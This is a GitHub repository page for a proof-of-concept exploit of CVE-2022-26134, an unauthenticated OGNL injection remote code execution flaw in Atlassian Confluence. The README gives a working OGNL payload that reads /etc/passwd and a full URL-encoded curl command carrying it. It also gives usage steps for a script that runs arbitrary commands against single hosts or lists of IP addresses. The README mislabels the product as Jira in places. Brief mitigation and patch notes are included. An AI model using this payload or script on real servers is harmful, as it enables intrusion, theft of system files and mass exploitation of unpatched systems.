Skip to content

Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.

License

Notifications You must be signed in to change notification settings

iveresk/cve-2022-26134

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-26134 by 1vere$k

Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.

CVE-2022-26134 - OGNL injection vulnerability.

Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.

Payload

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Example with CURL command:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

Then, the result of the command will be reflected in the parameter X-Cmd-Response in the response header.

Mitigations guidelines from vendors

Follow the official recommendations from Atlassian: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

Patched Versions

Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue.

Usage

1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>

Contact

You are free to contact me via Keybase for any details.

About

Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages